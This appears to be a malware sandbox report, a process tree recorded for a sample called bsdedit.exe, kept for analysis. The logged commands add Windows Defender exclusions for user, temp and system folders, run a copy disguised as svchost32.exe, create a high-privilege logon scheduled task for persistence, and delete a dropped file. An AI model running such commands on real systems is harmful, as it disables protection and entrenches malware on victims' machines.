| ZeroBOX

bsdedit.exe "C:\Users\test22\AppData\Local\Temp\bsdedit.exe"
2084
- cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
  656
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
    2492
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
    1192
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
    1464
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
    1200
- cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\bsdedit.exe"
  2212
  - svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\bsdedit.exe"
    816
    - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "bsdedit" /tr '"C:\Windows\system32\bsdedit.exe"' & exit
      196
      - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "bsdedit" /tr '"C:\Windows\system32\bsdedit.exe"'
        1648
    - bsdedit.exe "C:\Windows\system32\bsdedit.exe"
      2828
      - cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        2320
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
        2744
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
        2164
      - cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\bsdedit.exe"
        1608
        
        svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\bsdedit.exe"
        2736
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "bsdedit" /tr '"C:\Windows\system32\bsdedit.exe"' & exit
        2796
        
        schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "bsdedit" /tr '"C:\Windows\system32\bsdedit.exe"'
        1820
    - cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"
      2272
      - choice.exe choice /C Y /N /D Y /T 3
        1988

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents